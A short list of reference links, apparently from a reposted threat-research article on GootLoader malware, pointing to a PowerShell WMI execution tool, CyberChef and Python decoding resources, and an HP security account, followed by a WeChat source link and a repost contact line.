https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-WMIExec.ps1

https://github.com/The-DFIR-Report/cyberchef-recipes/blob/main/SEO%20Poisoning%20-%20A%20GootLoader%20Story

https://twitter.com/HPSecurity

https://github.com/hpthreatresearch/tools/blob/main/gootloader/decode.py


文章来源: http://mp.weixin.qq.com/s?__biz=MzkzMDE3ODc1Mw==&mid=2247486271&idx=1&sn=8bd0c7510ae4041f6fa5cc7bc93e5c18&chksm=c27f7891f508f1875a5669fb101e3c5a4ab74c750e11dfd7b81c442686b8e1015f3351d4e285#rd
如有侵权请联系:admin#unsafe.sh